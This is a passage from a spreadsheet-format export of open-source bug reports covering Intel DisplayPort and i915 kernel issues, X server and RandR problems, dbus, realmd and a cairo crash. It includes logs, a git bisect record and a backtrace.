Here arrise looks like it should really be arise.</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-914</t>
  </si>
  <si>
    <t>application/wordperfect should be application/vnd.wordperfect</t>
  </si>
  <si>
    <t>From https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=126293</t>
  </si>
  <si>
    <t>DRI-45801</t>
  </si>
  <si>
    <t>[SNB DP regression] no signal via DisplayPort since Linux  3.2</t>
  </si>
  <si>
    <t>Created attachment 56766
Xorg.0.log under Linux v3.2
This regression was first reported as http://bugs.debian.org/658662
Since upgrading to Linux 3.2 an external display connected via DisplayPort to a Sandy Bridge onboard graphics card stopped working and instead turns off reporting â€œDP no signalâ€.
With Linux 3.1 the same display connected via the DisplayPort works fine. After powering both the display and the machine the display first turns on when the i915 kernel module is loaded upon boot. It shows the console with boot messages at the maximum display resolution (1920x1080). Then the X server starts and the external display switches to a lower resolution (1024x768) which seems to be the default setting of the X server. After login I manually switch to the maximum resolution (1920x1080) using the command â€œxrandr --output DP1 --autoâ€.
With Linux 3.2 after powering both the display and the machine the display remains dark during boot even when the i915 kernel module is loaded. The display first turns on only when the X server is loaded with the default resolution 1024x768. After login I manually switch to 1920x1080 but then the display reports â€œDP no signalâ€ and turns *off*.
To summarize: The external display connected via DisplayPort works fine with Linux 3.1 while with Linux 3.2 it works with lower (non-native) resolutions and fails with the maximum (native) resolution.
I noticed one peculiarity: It is possible to have a working external display by booting into Linux 3.1 first and then rebooting into Linux 3.2 *without interrupting the power supply of the display*. However as soon as I power-cycle the display while under Linux 3.2 it stops working again.
There is a recent thread by Keith Packard with DisplayPort-related patches:
https://lkml.org/lkml/2012/1/25/204
I tested both a kernel with only PATCH 1/2 as well as a kernel with both PATCH 1/2 and 2/2 applied based on the Debian kernel source (linux-2.6_3.2.2-1) and using the Debian test-patches script. Both kernels showed the same faulty behaviour i.e. the external display remains dark at the native resolution.
Grepping for â€œdisplay portâ€ in the output of dmesg I noticed a difference in clock frequencies between Linux v3.1 and v3.2. If I assume correctly the three events correspond to the initial boot console (1920x1080) the loading
of X (1024x768) and the manual switch to maximum resolution using xrandr (1920x1080).
# grep -i display.*port linux-v3.2-dmesg 
[   12.749764] [drm:intel_dp_mode_fixup] Display port link bw 0a lane count 2 clock 270000
[   12.750194] [drm:intel_choose_pipe_bpp_dither] clamping display bpc (was -1) to EDID reported max of 8
[   20.656887] [drm:intel_dp_mode_fixup] Display port link bw 0a lane count 1 clock 270000
[   20.762319] [drm:intel_choose_pipe_bpp_dither] clamping display bpc (was -1) to EDID reported max of 8
[   36.514078] [drm:intel_dp_mode_fixup] Display port link bw 0a lane count 2 clock 270000
[   36.627340] [drm:intel_choose_pipe_bpp_dither] clamping display bpc (was -1) to EDID reported max of 8
# grep -i display.*port linux-v3.1-dmesg 
[   12.633926] [drm:intel_dp_mode_fixup] Display port link bw 06 lane count 4 clock 162000
[   12.634356] [drm:intel_choose_pipe_bpp_dither] clamping display bpc (was -1) to EDID reported max of 8
[   20.153953] [drm:intel_dp_mode_fixup] Display port link bw 0a lane count 1 clock 270000
[   20.263372] [drm:intel_choose_pipe_bpp_dither] clamping display bpc (was -1) to EDID reported max of 8
[   34.066974] [drm:intel_dp_mode_fixup] Display port link bw 06 lane count 4 clock 162000
[   34.178512] [drm:intel_choose_pipe_bpp_dither] clamping display bpc (was -1) to EDID reported max of 8
For this upstream bug report I bisected the Linux git sources between versions v3.1 and v3.2.
Testing was done following the instructions by Jonathan Nieder:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=658662#29
cd9dde44f47501394b9f0715b6a36a92aa74c0d0 is the first bad commit
commit cd9dde44f47501394b9f0715b6a36a92aa74c0d0
Author: Adam Jackson 
Date:   Fri Oct 14 12:43:49 2011 -0400
    drm/i915/dp: Fix the math in intel_dp_link_required
    The previous code was confused about units which is pretty reasonable
    given that the units themselves are confusing.
    Signed-off-by: Adam Jackson 
    Signed-off-by: Keith Packard 
:040000 040000 3c0a0f38fc6482a401340e03fa3fbd687d11eda4 294673b782b3ecc93540f46f7721d385bd30cfac M      drivers
# git bisect log
# bad: [805a6af8dba5dfdd35ec35dc52ec0122400b2610] Linux 3.2
# good: [c3b92c8787367a8bb53d57d9789b558f1295cc96] Linux 3.1
git bisect start 'v3.2' 'v3.1'
# bad: [68d99b2c8efcb6ed3807a55569300c53b5f88be5] Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound
git bisect bad 68d99b2c8efcb6ed3807a55569300c53b5f88be5
# good: [efb8d21b2c6db3497655cc6a033ae8a9883e4063] Merge branch 'tty-next' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty
git bisect good efb8d21b2c6db3497655cc6a033ae8a9883e4063
# good: [8686a0e200419322654a75155e2e6f80346a1297] Merge branch 'perf-urgent-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/tip
git bisect good 8686a0e200419322654a75155e2e6f80346a1297
# bad: [f362f98e7c445643d27c610bb7a86b79727b592e] Merge branch 'for-next' of git://git.kernel.org/pub/scm/linux/kernel/git/hch/vfs-queue
git bisect bad f362f98e7c445643d27c610bb7a86b79727b592e
# good: [ca836a25435ef1b9914840ed0a310c9b6ac261d1] Merge branch 'x86-vdso-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/tip
git bisect good ca836a25435ef1b9914840ed0a310c9b6ac261d1
# good: [c5c42360bc1cb14c7da3186683e9525b33b72656] vmwgfx: Don't pass unused arguments to do_dirty functions
git bisect good c5c42360bc1cb14c7da3186683e9525b33b72656
# bad: [5619a693965b291315685bdfe01a0246ebd7e41e] Merge branch 'for-linus' of git://oss.sgi.com/xfs/xfs
git bisect bad 5619a693965b291315685bdfe01a0246ebd7e41e
# bad: [82d165557ef094d4b4dfc05871aee618ec7102b0] drm/i915/dp: Fix eDP on PCH DP on CPT/PPT
git bisect bad 82d165557ef094d4b4dfc05871aee618ec7102b0
# good: [a9e2641dee52cae2db7688a749344365642a5e79] drm/i915: close PM interrupt masking races in the rps work func
git bisect good a9e2641dee52cae2db7688a749344365642a5e79
# good: [75770564c90c45618003267f4cdde4bbc090f1bd] drm/i915: use transcoder select bits on VGA and HDMI on CPT
git bisect good 75770564c90c45618003267f4cdde4bbc090f1bd
# good: [a487928908226df493a3ce145ecf4bb39296714e] drm/i915: remove transcoder PLL mashing from mode_set per specs
git bisect good a487928908226df493a3ce145ecf4bb39296714e
# bad: [a2006cf5a7ad3463e7c1e9da2c4bc90499427558] drm/i915: read full receiver capability field during DP hot plug
git bisect bad a2006cf5a7ad3463e7c1e9da2c4bc90499427558
# good: [f52c619a590fa75276c07dfcaf380dee53e4ea4c] drm/i915/panel: Always record the backlight level again (but cleverly)
git bisect good f52c619a590fa75276c07dfcaf380dee53e4ea4c
# bad: [dc22ee6fc18ce0f15424e753e8473c306ece95c1] drm/i915/dp: Remove eDP special cases from bandwidth checks
git bisect bad dc22ee6fc18ce0f15424e753e8473c306ece95c1
# bad: [cd9dde44f47501394b9f0715b6a36a92aa74c0d0] drm/i915/dp: Fix the math in intel_dp_link_required
git bisect bad cd9dde44f47501394b9f0715b6a36a92aa74c0d0
System environment: 
-- chipset: GT2+
-- system architecture: x86_64
-- xf86-video-intel: 2.17.0
-- xserver: 1.11.3.901
-- mesa: 7.11.2
-- libdrm: 2.4.30
-- kernel: 3.2.0
-- Linux distribution: Debian GNU/Linux testing (wheezy)
-- Machine or mobo model: Intel Sandybridge Mobile
-- Display connector: DisplayPort</t>
  </si>
  <si>
    <t>DBUS-8364</t>
  </si>
  <si>
    <t>Build fails if --enable-tests is passed in command line</t>
  </si>
  <si>
    <t>Attempting to see if I could at least begin to track down the causes of bug 8363 I found that building 
dbus fails on Mac OS X 10.4.7 (gcc powerpc-apple-darwin8-gcc-4.0.1 (GCC) 4.0.1 (Apple Computer Inc. 
build 5363)) when --enable-tests is passed.
Will attach log of failure.
Log of build with --disable-tests is at https://bugs.freedesktop.org/attachment.cgi?id=7092
Bug 8363 is at https://bugs.freedesktop.org/show_bug.cgi?id=8363</t>
  </si>
  <si>
    <t>rhwood</t>
  </si>
  <si>
    <t>DRI-103830</t>
  </si>
  <si>
    <t>[CI] igt@gem_userptr_blits@dmabuf-unsync - dmesg-warn - WARNING: possible circular locking dependency detecte</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/IGT_3993/shard-hsw5/igt@gem_userptr_blits@dmabuf-unsync.html
[ 5718.368156] ======================================================
[ 5718.368159] WARNING: possible circular locking dependency detected
[ 5718.368163] 4.14.0-CI-CI_DRM_3364+ #1 Tainted: G     U  W      
[ 5718.368166] ------------------------------------------------------
[ 5718.368169] gem_userptr_bli/26317 is trying to acquire lock:
[ 5718.368172]  (&amp;mm-&gt;mmap_sem){++++} at: [] i915_gem_userptr_init__mmu_notifier+0x1af/0x360 [i915]
[ 5718.368227] 
               but task is already holding lock:
[ 5718.368230]  (&amp;dev-&gt;object_name_lock){+.+.} at: [] drm_gem_prime_handle_to_fd+0xe2/0x1b0
[ 5718.368238] 
               which lock already depends on the new lock.
[ 5718.368242] 
               the existing dependency chain (in reverse order) is:
[ 5718.368246] 
               -&gt; #2 (&amp;dev-&gt;object_name_lock){+.+.}:
[ 5718.368253]        __mutex_lock+0x86/0x9b0
[ 5718.368256]        drm_gem_handle_create+0x24/0x40
[ 5718.368281]        igt_ctx_exec+0x611/0xe30 [i915]
[ 5718.368313]        __i915_subtests+0x34/0xc0 [i915]
[ 5718.368343]        __run_selftests+0x11c/0x1c0 [i915]
[ 5718.368374]        i915_live_selftests+0x31/0x60 [i915]
[ 5718.368396]        i915_pci_probe+0x45/0x90 [i915]
[ 5718.368400]        pci_device_probe+0xa1/0x130
[ 5718.368404]        driver_probe_device+0x293/0x440
[ 5718.368408]        __driver_attach+0xde/0xe0
[ 5718.368411]        bus_for_each_dev+0x5c/0x90
[ 5718.368414]        bus_add_driver+0x16d/0x260
[ 5718.368418]        driver_register+0x57/0xc0
[ 5718.368421]        do_one_initcall+0x3e/0x160
[ 5718.368425]        do_init_module+0x5b/0x1fa
[ 5718.368429]        load_module+0x2374/0x2dc0
[ 5718.368432]        SyS_finit_module+0xaa/0xe0
[ 5718.368436]        entry_SYSCALL_64_fastpath+0x1c/0xb1
[ 5718.368439] 
               -&gt; #1 (&amp;dev-&gt;struct_mutex){+.+.}:
[ 5718.368445]        __mutex_lock+0x86/0x9b0
[ 5718.368471]        i915_gem_set_caching_ioctl+0xdc/0x290 [i915]
[ 5718.368499]        i915_gem_object_get_sg+0x396/0x3c0 [i915]
[ 5718.368503]        __do_fault+0x1a/0x70
[ 5718.368506]        __handle_mm_fault+0x7c4/0xdb0
[ 5718.368509]        handle_mm_fault+0x154/0x300
[ 5718.368512]        __do_page_fault+0x2d6/0x570
[ 5718.368515]        page_fault+0x22/0x30
[ 5718.368518] 
               -&gt; #0 (&amp;mm-&gt;mmap_sem){++++}:
[ 5718.368525]        lock_acquire+0xaf/0x200
[ 5718.368528]        down_write+0x38/0x70
[ 5718.368557]        i915_gem_userptr_init__mmu_notifier+0x1af/0x360 [i915]
[ 5718.368582]        i915_gem_prime_export+0x6e/0x90 [i915]
[ 5718.368586]        drm_gem_prime_handle_to_fd+0x186/0x1b0
[ 5718.368589]        drm_ioctl_kernel+0x65/0xb0
[ 5718.368592]        drm_ioctl+0x295/0x340
[ 5718.368595]        do_vfs_ioctl+0x8f/0x670
[ 5718.368599]        SyS_ioctl+0x3b/0x70
[ 5718.368602]        entry_SYSCALL_64_fastpath+0x1c/0xb1
[ 5718.368604] 
               other info that might help us debug this:
[ 5718.368609] Chain exists of:
                 &amp;mm-&gt;mmap_sem --&gt; &amp;dev-&gt;struct_mutex --&gt; &amp;dev-&gt;object_name_lock
[ 5718.368616]  Possible unsafe locking scenario:
[ 5718.368620]        CPU0                    CPU1
[ 5718.368622]        ----                    ----
[ 5718.368624]   lock(
[ 5718.368627]                                lock(
[ 5718.368631]                                lock(
[ 5718.368635]   lock(
[ 5718.368637] 
                *** DEADLOCK ***
[ 5718.368642] 2 locks held by gem_userptr_bli/26317:
[ 5718.368644]  #0:  (&amp;prime_fpriv-&gt;lock){+.+.} at: [] drm_gem_prime_handle_to_fd+0x35/0x1b0
[ 5718.368651]  #1:  (&amp;dev-&gt;object_name_lock){+.+.} at: [] drm_gem_prime_handle_to_fd+0xe2/0x1b0
[ 5718.368658] 
               stack backtrace:
[ 5718.368662] CPU: 7 PID: 26317 Comm: gem_userptr_bli Tainted: G     U  W       4.14.0-CI-CI_DRM_3364+ #1
[ 5718.368666] Hardware name: MSI MS-7924/Z97M-G43(MS-7924) BIOS V1.12 02/15/2016
[ 5718.368669] Call Trace:
[ 5718.368674]  dump_stack+0x5f/0x86
[ 5718.368678]  print_circular_bug.isra.18+0x1d0/0x2c0
[ 5718.368682]  __lock_acquire+0x19c3/0x1b60
[ 5718.368687]  ? lock_acquire+0xaf/0x200
[ 5718.368690]  lock_acquire+0xaf/0x200
[ 5718.368720]  ? i915_gem_userptr_init__mmu_notifier+0x1af/0x360 [i915]
[ 5718.368724]  down_write+0x38/0x70
[ 5718.368753]  ? i915_gem_userptr_init__mmu_notifier+0x1af/0x360 [i915]
[ 5718.368782]  i915_gem_userptr_init__mmu_notifier+0x1af/0x360 [i915]
[ 5718.368808]  i915_gem_prime_export+0x6e/0x90 [i915]
[ 5718.368812]  drm_gem_prime_handle_to_fd+0x186/0x1b0
[ 5718.368816]  ? drm_prime_remove_buf_handle_locked+0x90/0x90
[ 5718.368820]  drm_ioctl_kernel+0x65/0xb0
[ 5718.368823]  drm_ioctl+0x295/0x340
[ 5718.368826]  ? drm_prime_remove_buf_handle_locked+0x90/0x90
[ 5718.368830]  ? __handle_mm_fault+0x83a/0xdb0
[ 5718.368835]  do_vfs_ioctl+0x8f/0x670
[ 5718.368838]  ? entry_SYSCALL_64_fastpath+0x5/0xb1
[ 5718.368842]  ? trace_hardirqs_on_caller+0xde/0x1c0
[ 5718.368846]  SyS_ioctl+0x3b/0x70
[ 5718.368849]  entry_SYSCALL_64_fastpath+0x1c/0xb1
[ 5718.368853] RIP: 0033:0x7f29b6cfb587
[ 5718.368855] RSP: 002b:00007ffeda5a69b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[ 5718.368860] RAX: ffffffffffffffda RBX: ffffc900008bfff0 RCX: 00007f29b6cfb587
[ 5718.368863] RDX: 00007ffeda5a69f4 RSI: 00000000c00c642d RDI: 0000000000000005
[ 5718.368866] RBP: 0000000000000001 R08: 0000000000001000 R09: 0000000000004010
[ 5718.368870] R10: 00007f29b6fbeb58 R11: 0000000000000246 R12: 0000000000000046
[ 5718.368873] R13: 00007ffeda5a7260 R14: 0000000000000000 R15: 0000000000000000</t>
  </si>
  <si>
    <t>XORG-22893</t>
  </si>
  <si>
    <t>KMS Intel graphics incompatible with RandR scaling feature</t>
  </si>
  <si>
    <t>With KMS enabled the RandR scaling feature does not function properly.
On a 1024x600 display running xrandr --output LVDS --scale 1x1.28 should
result in a 1024x768 resolution displayed on the screen.
This works fine if you disable KMS at kernel startup time.
Initially reported on SUSE Linux Enterprise Desktop 11. Reproduced on Moblin v2.0 beta (July 10th build) SUSE Edition of Moblin.
Also tested against the latest git release and the problem still seems present.
To reproduce:
On a system with latest Xorg git + kernel with KMS enabled
Run xrandr --output LVDS --scale 1x1.28 
The scaling does NOT happen.
To make it work:
On the same system place i915.modeset=0 (or disable KMS in some other way)
Run xrandr --output LVDS --scale 1x1.28 
The scaling does happen. Of course performances are bad.</t>
  </si>
  <si>
    <t>REALMD-69016</t>
  </si>
  <si>
    <t>adcli and realmd need to handle long hostnames</t>
  </si>
  <si>
    <t>AD doesn't support netbios names longer than 15 characters. We need to truncate our netbios names the same way windows clients do.
This applies to both adcli and realmd.</t>
  </si>
  <si>
    <t>DRI-3378</t>
  </si>
  <si>
    <t>_glapi_add_entrypoint does not generate offset for drivers</t>
  </si>
  <si>
    <t>_glapi_add_entrypoint accepts an offset of ~0 for two reaons.  The primary
reason is so that glXGetProcAddress can always return a non-NULL value.  If an
unknown function is requested a dummy stub will be generated and returned to
the application.  The intention being that a loaded driver will later fill-in
the offset to complete the function.
The other reason is so that drivers can extend the GL API with functions that do
not have statically assigned offsets.  For example an IHV could add a new
perhaps experimental extension.  It would register its functions by calling
'_glapi_add_entrypoint(glNewFunctionIHV ~0)' and get the actual offset by
calling '_glapi_get_proc_offset(glNewFunctionIHV)'.  This second usage
requires that libGL assign an offset.  Currently there is NO code to do this. 
If a loaded driver calls _glapi_add_entrypoint with an offset of ~0 the offset
will remain ~0!</t>
  </si>
  <si>
    <t>XORG-13063</t>
  </si>
  <si>
    <t>100% CPU load when X server launched with -sharevts option</t>
  </si>
  <si>
    <t>I have an additional PCI graphics card in my PC (Fedora 7) connected to small LCD touch screen. I am trying to drive it using independent X server (vesa driver) with -novtswitch -sharevts options. Invocation line:
/usr/bin/Xorg :1 -config xorg.conf.flat -auth /opt/mollp/status.xauth -novtswitch -sharevts
It generally works fine with one exception - it load CPU for 100%!!! Quick investigation revealed the problem:
$ strace -p 
(...)
select(256 [1 3 5 9 10 11] NULL NULL {2 188000}) = 1 (in [3] left {2 188000})
rt_sigprocmask(SIG_BLOCK [IO] [] 8)  = 0
read(3  64)                         = 0
rt_sigprocmask(SIG_UNBLOCK [IO] NULL 8) = 0
gettimeofday({1194025555 827261} NULL) = 0
gettimeofday({1194025555 827320} NULL) = 0
select(256 [1 3 5 9 10 11] NULL NULL {2 187000}) = 1 (in [3] left {2 187000})
rt_sigprocmask(SIG_BLOCK [IO] [] 8)  = 0
read(3  64)                         = 0
rt_sigprocmask(SIG_UNBLOCK [IO] NULL 8) = 0
gettimeofday({1194025555 827750} NULL) = 0
gettimeofday({1194025555 827809} NULL) = 0
select(256 [1 3 5 9 10 11] NULL NULL {2 187000}) = 1 (in [3] left {2 187000})
rt_sigprocmask(SIG_BLOCK [IO] [] 8)  = 0
read(3  64)                         = 0
rt_sigprocmask(SIG_UNBLOCK [IO] NULL 8) = 0
gettimeofday({1194025555 828203} NULL) = 0
gettimeofday({1194025555 828264} NULL) = 0
select(256 [1 3 5 9 10 11] NULL NULL {2 186000}) = 1 (in [3] left {2 186000})
rt_sigprocmask(SIG_BLOCK [IO] [] 8)  = 0
read(3  64)                         = 0
rt_sigprocmask(SIG_UNBLOCK [IO] NULL 8) = 0
gettimeofday({1194025555 828642} NULL) = 0
gettimeofday({1194025555 828701} NULL) = 0
select(256 [1 3 5 9 10 11] NULL NULL {2 186000}) = 1 (in [3] left {2 186000})
(...)
This is some kind of while (1) loop. Opened descriptors:
$ ls -l /proc//fd
total 0
l-wx------ 1 root root 64 2007-11-02 17:46 0 -&gt; /var/log/Xorg.1.log
lrwx------ 1 root root 64 2007-11-02 17:46 1 -&gt; socket:[11991]
lrwx------ 1 root root 64 2007-11-02 17:46 10 -&gt; socket:[12148]
lrwx------ 1 root root 64 2007-11-02 17:46 11 -&gt; socket:[12184]
lrwx------ 1 root root 64 2007-11-02 17:46 2 -&gt; /dev/pts/0
lrwx------ 1 root root 64 2007-11-02 17:46 3 -&gt; /proc/bus/pci/05/0e.0
l-wx------ 1 root root 64 2007-11-02 17:46 4 -&gt; /proc/mtrr
lrwx------ 1 root root 64 2007-11-02 17:46 5 -&gt; socket:[12079]
lr-x------ 1 root root 64 2007-11-02 17:46 6 -&gt; /etc/touchscreen.cal
lrwx------ 1 root root 64 2007-11-02 17:46 7 -&gt; /dev/hiddev0
lrwx------ 1 root root 64 2007-11-02 17:46 8 -&gt; /dev/ttyS0
lrwx------ 1 root root 64 2007-11-02 17:46 9 -&gt; socket:[12143]
When launched without -sharevts X server behave properly doing the same thing (select(...) read(3 ...)) but this time descriptor 3 is a virtual terminal...
I have tested this using glint driver as well (this card is some 3D Labs product) and situation is exactly the same so either there is the same bug in both drivers or it is core problem...
I will attach configuration file.</t>
  </si>
  <si>
    <t>CAIRO-27834</t>
  </si>
  <si>
    <t>Crash in cairo-bentley-ottmann-rectangular.c:454</t>
  </si>
  <si>
    <t>When double clicking in the Pino microblogging client in the webkit view it crashes with this backtrace:
Core was generated by `pino'.
Program terminated with signal 11 Segmentation fault.
#0  0x0000003815611d3d in active_edges_to_traps (
    rectangles= num_rectangles= 
    fill_rule= do_traps= 
    container=0x7fff3cdfd440) at cairo-bentley-ottmann-rectangular.c:454
454			if (right-&gt;x != pos-&gt;x)
Thread 3 (Thread 31961):
#0  pthread_cond_wait@@GLIBC_2.3.2 ()
    at ../nptl/sysdeps/unix/sysv/linux/x86_64/pthread_cond_wait.S:162
No locals.
#1  0x0000003199851e78 in WebCore::IconDatabase::syncThreadMainLoop (this=
    0x7fcd88c19a00) at WebCore/loader/icon/IconDatabase.cpp:1412
        didAnyWork = 
#2  0x0000003199851f41 in WebCore::IconDatabase::iconDatabaseSyncThread (this=
    0x7fcd88c19a00) at WebCore/loader/icon/IconDatabase.cpp:1030
        journalFilename = {m_impl = { = 
    {} m_ptr = 0x7fcd88c20f20}}
#3  0x000000380e206a5d in start_thread (arg=)
    at pthread_create.c:297
        __res = 
        pd = 0x7fcd88c01710
        unwind_buf = {cancel_jmp_buf = {{jmp_buf = {140520739313424 
    2062520808719773856 240755215744 0 240748974144 3 
    -2088374730029010784 2085052276750282912} mask_was_saved = 0}} priv = {
            pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 
              canceltype = 0}}}
        not_first_call = 
        robust = 
        freesize = 
#4  0x000000380dedb13d in clone ()
    at ../sysdeps/unix/sysv/linux/x86_64/clone.S:112
No locals.
#5  0x0000000000000000 in ?? ()
No symbol table info available.
Thread 2 (Thread 31960):
#0  pthread_cond_wait@@GLIBC_2.3.2 ()
    at ../nptl/sysdeps/unix/sysv/linux/x86_64/pthread_cond_wait.S:162
No locals.
#1  0x0000003199b51734 in WTF::TCMalloc_PageHeap::scavengerThread (this=
    0x319a3d3060) at JavaScriptCore/wtf/FastMalloc.cpp:2378
No locals.
#2  0x0000003199b51759 in WTF::TCMalloc_PageHeap::runScavengerThread (context=
    0x319a3e1134) at JavaScriptCore/wtf/FastMalloc.cpp:1497
No locals.
#3  0x000000380e206a5d in start_thread (arg=)
    at pthread_create.c:297
        __res = 
        pd = 0x7fcd89502710
        unwind_buf = {cancel_jmp_buf = {{jmp_buf = {140520748754704 
    2062520808719773856 240755215744 0 240748974144 3 
    -2088375967516462944 2085052276750282912} mask_was_saved = 0}} priv = {
            pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 
              canceltype = 0}}}
        not_first_call = 
        robust = 
        freesize = 
#4  0x000000380dedb13d in clone ()
    at ../sysdeps/unix/sysv/linux/x86_64/clone.S:112
No locals.
#5  0x0000000000000000 in ?? ()
No symbol table info available.
Thread 1 (Thread 31529):
#0  0x0000003815611d3d in active_edges_to_traps (
    rectangles= num_rectangles= 
    fill_rule= do_traps= 
    container=0x7fff3cdfd440) at cairo-bentley-ottmann-rectangular.c:454
        pos = 0x0
#1  _cairo_bentley_ottmann_tessellate_rectangular (
    rectangles= num_rectangles= 
    fill_rule= do_traps= 
    container=0x7fff3cdfd440) at cairo-bentley-ottmann-rectangular.c:632
        sweep_line = {rectangles = 0x7fff3cdfc6c8 pq = {size = 2 max_size = 
    1024 elements = 0x7fff3cdf9d48 elements_embedded = {0x7fff3cdf9d58 
    0x7fff3cdfbf18 0x7fff3cdfbec0 0x41000000 0x40a00000 0x41000000 
    0x41000000 0x40400000 0x41000000 0x41300000 0x40400000 0x40400000 
    0x40400000 0x40e00000 0x41000000 0x40800000 0x40a00000 0x40e00000 
    0x41000000 0x40a00000 0x40a00000 0x41000000 0x41200000 0x40800000 
    0x41300000 0x41000000 0x40a00000 0x40e00000 0x40400000 0x40e00000 
    0x41000000 0x40400000 0x40800000 0x41100000 0x41000000 0x40e00000 
    0x40a00000 0x40400000 0x7fff3cdf9e90 0x0 0x20 0x0 0x3a8000003e8 
    0x7fff3cdf9ee8 0x0 0x64002200002200 0x7fff3cdf9740 0x0 
    0x7fff3cdf9ea8 0x2200 0x7fff3cdf96f0 0x0 0x632e2f6b69726564 
    0x6e69702f65686361 0x613a707474682f6f 0x64692e7261746176 
    0x3161632e69746e65 0x2d38342d36353932 0x3133313039303032 
    0x702e373533333630 0x61657274732d676e 0x2e00676e702e6d 0xa0 0x14 
    0x2830 0x0 0x0 0x2 0xd000000281 0x7c0000006f 0x7000000077 
    0x40000000000 0x7fff3cdf9f90 0x380e167e80 0x0 0x7fff3cdf9bb8 0x2810 
    0xa10 0x380de765f0 0x1ea9 0x3815654c18 0x0 0x1a66d50 0x380e167e80 
    0x2800 0x1a66d40 0x380de767e7 0x40 0x1ea9 0x0 0x3a2499 
    0xffffffffffffffff 0x381560eb54 0x5fa00 0x3815654c18 0x1a872b0 0x0 
    0x0 0x1a66fe0 0x600 0x0 0x0 0x5e7 0x7fff3cdfa118 0x7fff3cdfa0a0 
    0x0 0xfb3220 0x3000 0x0 0x7fff3cdfa178 0x7fff3cdfa138 
    0x7fff3cdfa118 0x7fff3cdfa0e0 0x0 0x20 0x0 0x3a8000003e8 
    0x7fff3cdfa138 0x0 0x7fff00003000 0xfb3220 0x0 0x7fff3cdfa0f8 
    0x3000 0xfb31d0 0x0 0x7fff3cdfa158 0x7fff00000400 0x1a674e0 0x0 
    0x7fff3cdfa0d8 0x7fff3cdf99e0 0x7fff3cdf9990 0x0 0x3cdfaaf0 
    0x20000000002 0x3800000580 0x58000000200 0x1f0000000200 
    0x1f0000000580 0x7fff00000001 0x0 0x0 0x0 0x58a 0x30000000002 
    0x3800000580 0x58000000300 0x1f0000000300 0x1f0000000580 
    0x7fffffffffff 0x0 0x0 0x0 0x7fff3cdfa230 0x23f00000002 0x43c 0x0 
    0x7fff3cdf99f0 0x56700001e00 0x0 0x0 0x0 0x7fff3cdfa2b8 
    0x7fff3cdfa280 0x0 0x20 0x0 0x3a8000003e8 0x7fff3cdfa2d8 0x0 
    0x7fff00001e00 0x7fff3cdf99f0 0x0 0x7fff3cdfa298 0x28000001e00 
    0x7fff3cdf99a0 0x0 0x599000002fd 0x59900000580 0x100000001 
    0x7fff3cdfa190 0x7fff3cdfa1e0 0x0 0x1 0x20300000002 0x567 
    0x7fff3cdf9ba0 0x7fff3cdf9b50 0x0 0x7fcd00000001 0x0 0x0 0x0 
    0x567 0x2f700000002 0x319 0x319000002f7 0x40d00000252 
    0x40d00000319...}} head = {next = 0x7fff3cdfbf18 prev = 0x7fff3cdfc660 
            right = 0x0 x = -2147483648 top = 0 dir = 0} tail = {next = 
    0x0 prev = 0x7fff3cdfbee8 right = 0x0 x = 2147483647 top = 0 dir = 
    0} insert_left = 0x7fff3cdfbec0 insert_right = 0x7fff3cdfbee8 
          current_y = 0 last_y = -5888 fill_rule = 
    CAIRO_FILL_RULE_EVEN_ODD unwind = {{__jmpbuf = {2 2062213500353638560 
    140734214686392 0 1321528399 140734214686384 -2062101071331331936 
    2085062712597934240} __mask_was_saved = 0 __saved_mask = {__val = {0 
    240860024480 27652064 15560784 3 29379697 140734214686528 83 15 
    240860013415 18446744073709551615 236223201295 0 29379697 27652064 
    83}}}}}
        rectangle = 
        status = CAIRO_STATUS_SUCCESS
        update = 
#2  0x00000038156120e6 in _cairo_bentley_ottmann_tessellate_rectangular_traps
    (traps=0x7fff3cdfd440 fill_rule=CAIRO_FILL_RULE_EVEN_ODD)
    at cairo-bentley-ottmann-rectangular.c:703
        stack_rectangles = {{left = {next = 0x7fff3cdfbf40 prev = 
    0x7fff3cdfbf18 right = 0x0 x = 0 top = 32767 dir = 1} right = {
              next = 0x7fff3cdfbd70 prev = 0x7fff3cdfbf40 right = 0x0 x = 
    68608 top = 0 dir = -1} top = 0 bottom = 7680} {left = {next = 
    0x7fff3cdfbec0 prev = 0x7fff3cdfbd48 right = 0x7fff3cdfbf40 x = 
    -12288 top = -5888 dir = 1} right = {next = 0x7fff3cdfbee8 prev = 
    0x7fff3cdfbec0 right = 0x0 x = 0 top = 56 dir = -1} top = -5888 
            bottom = 6400} {left = {next = 0x3814e14d60 prev = 0x1a5efe0 
              right = 0x7fff3cdfbffc x = 0 top = 0 dir = -1} right = {
              next = 0x4038000000000000 prev = 0x4038000000000000 right = 
    0x1afcf90 x = 1 top = 0 dir = 1021296672} top = 359170832 bottom = 
    56} {left = {next = 0x1 prev = 0x0 right = 0x3815646a32 x = 1 top = 
    0 dir = 28299152} right = {next = 0x7fff3cdfc020 prev = 
    0x7fff3cdfc020 right = 0x38156882a0 x = 358918181 top = 56 dir = 
    1021299168} top = 1021301216 bottom = 32767} {left = {next = 0x0 
              prev = 0x1e00000002 right = 0x0 x = 358870011 top = 56 
              dir = 0} right = warning: can't find linker symbol for virtual table for `(null)' value
{next = 0x3815646dd5 prev = 0x0 right = 
    0x0 x = 0 top = 0 dir = 350561120} top = 0 bottom = 0} {left = {
              next = 0x3000000030 prev = 0x10000 right = 0x1afcf90 x = 1 
              top = 0 dir = 28299152} right = {next = 0x1a37a80 prev = 
    0x2 right = 0xfe x = 30 top = 0 dir = -2013152344} top = 371307697 
            bottom = 56} {left = {next = 0x7fff3cdfc100 prev = 
    0x7fff3cdfc100 right = 0x3815688200 x = 358918615 top = 56 dir = 
    1021299392} right = {next = 0x1a37a80 prev = 0x1afcf90 right = 
    0x7fff3cdfc750 x = 0 top = 8 dir = 0} top = 254 bottom = 0} warning: can't find linker symbol for virtual table for `(null)' value
{left = warning: can't find linker symbol for virtual table for `(null)' value
{next = 0x3815648f68 prev = 0x7fff3cdfc3cc right = 0x7fff3cdfc3c8 x = 
    -2013152344 top = 32717 dir = 371307697} right = {next = 
